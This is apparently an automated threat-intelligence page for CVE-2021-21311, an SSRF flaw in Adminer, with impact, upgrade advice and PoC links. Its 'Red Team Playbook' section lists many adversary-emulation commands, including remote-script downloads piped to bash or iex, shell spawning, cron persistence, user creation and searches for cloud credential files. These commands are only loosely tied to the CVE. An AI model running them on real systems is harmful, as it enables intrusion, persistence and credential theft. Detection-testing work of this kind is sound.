CVE-2021-21311
Overview
The vulnerability is a server-side request forgery (SSRF) in the Adminer database management tool. It arises from improper validation of user-supplied input in the authentication parameters, specifically the 'auth[server]' field, allowing crafted requests to trigger unintended server-side HTTP requests. This flaw affects the bundled driver configuration in Adminer versions from 4.0.0 up to and including 4.7.8, impacting the PHP single-file interface that handles database connections.
Vulnerability Description
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
Impact
An attacker can exploit this vulnerability without authentication or user interaction to induce Adminer to make arbitrary HTTP requests from the server hosting the application. This can lead to unauthorized access to internal network resources, bypassing firewall restrictions and potentially exposing sensitive internal services or data. The ability to pivot into internal systems increases the risk of data leakage and lateral movement within an organization’s infrastructure.
Solution
Upgrade Adminer to version 4.7.9 or later where this SSRF vulnerability is fixed. Refer to the official security advisory published by the vendor at https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 for detailed patch instructions. Users bundling all drivers in a single file (e.g., adminer.php) must ensure they apply this update to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Adminer, an open-source database management tool, is characterized as a server-side request forgery (SSRF). This flaw allows an attacker to manipulate the server into making unintended requests to internal or external resources. Specifically, the issue arises when user input is not adequately sanitized, enabling an attacker to craft a request that the server processes as legitimate. This can lead to unauthorized access to sensitive data or services that are otherwise protected by network segmentation or firewalls. The affected versions of Adminer, particularly those that bundle all drivers, are particularly vulnerable due to their reliance on user input for database connection parameters.
Attack vectors for exploiting this vulnerability can vary, but a common scenario involves an attacker leveraging the Adminer interface to input malicious URLs. By doing so, they can trick the server into making requests to internal services, such as metadata services or administrative interfaces, which are not exposed to the public internet. This could allow the attacker to retrieve sensitive information, such as credentials or configuration data, that would typically be inaccessible. Additionally, if the server has access to other internal systems, the attacker could potentially pivot to those systems, escalating the impact of the attack. The simplicity of executing such an attack makes it particularly concerning for organizations that rely on Adminer for database management.
The real-world impact of this vulnerability can be significant, especially for organizations that utilize Adminer in production environments. The potential for data leakage or unauthorized access to internal services poses a serious business risk. For instance, if an attacker successfully exploits this vulnerability, they could gain access to sensitive customer data, intellectual property, or even administrative controls over the database itself. This could lead to severe reputational damage, regulatory fines, and loss of customer trust. Furthermore, the financial implications of a data breach can be substantial, encompassing costs related to incident response, legal fees, and potential compensation for affected parties.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to ensure that all instances of Adminer are updated to the latest version, which addresses the SSRF vulnerability. Regular patch management practices should be established to minimize the risk of exposure to known vulnerabilities. Additionally, organizations should employ network segmentation to limit the access of the Adminer application to only necessary internal resources. Implementing web application firewalls (WAFs) can also help in detecting and blocking malicious requests before they reach the server. Furthermore, organizations should conduct regular security assessments and penetration testing to identify potential weaknesses in their configurations and application usage.
In conclusion, the server-side request forgery vulnerability in Adminer represents a significant threat to organizations that utilize this database management tool. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention from security teams. By adopting proactive detection and mitigation strategies, organizations can safeguard their data and maintain the integrity of their systems against such vulnerabilities. Ensuring that software is kept up to date, combined with robust security practices, will significantly reduce the risk posed by this and similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-21311, indicating renewed exploitation attempts targeting vulnerable Adminer instances. Although the EPSS score has slightly decreased, the emergence of new proof-of-concept exploits on public repositories underscores sustained attacker interest and the potential for broader weaponization. Our telemetry reveals the first confirmed sighting of active exploitation in the wild, signaling that threat actors are moving beyond theoretical research into practical application. This development elevates the urgency for defenders to monitor for exploitation indicators, as the vulnerability’s high severity and ease of exploitation continue to pose a significant risk. While ransomware use linked to this vulnerability remains unconfirmed, the increased exploitation activity could facilitate initial access or lateral movement in complex attack chains, thereby amplifying the overall threat landscape.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Adminer | Adminer | All |
cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
omoknooni/CVE-2021-21311
|
omoknooni | 3 | 1 | 2023-06-12 | View |
|
Sudo-WP/sudowp-adminer
A secure, zero-trust database management tool for WordPress. Fixes critical SSRF vulnerabilities (CVE-2021-21311) by enf...
|
Sudo-WP | 1 | 0 | 2026-01-24 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
34%
|
High | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-21311 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf |
| packagist.org |
GitHub CVE
x_refsource_MISC
|
https://packagist.org/packages/vrana/adminer |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 |
| lists.debian.org |
GitHub CVE
mailing-list
x_refsource_MLIST
|
https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21311 |